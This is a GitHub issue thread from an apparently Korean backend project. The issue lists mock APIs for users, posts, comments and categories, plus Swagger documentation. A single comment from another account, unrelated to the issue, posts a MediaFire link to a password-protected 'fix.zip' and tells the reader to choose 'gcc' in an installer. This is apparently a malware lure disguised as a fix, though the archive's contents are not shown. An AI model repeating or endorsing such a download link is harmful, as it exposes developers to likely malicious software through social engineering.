### ISSUE TITLE
Mock API

### ISSUE THREAD

**Issue by yunuo46** [Wan-Du/GapLog-Back#12]
## 📄 ISSUE
domain 별로 mock api를 개발
Swaager를 통한 명세서 작성

### ✔️ TO DO
- [x] User mock api
- [x] Post mock api
- [x] Comment mock api
- [x] Category mock api

**Comment by nxllxvxxd** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
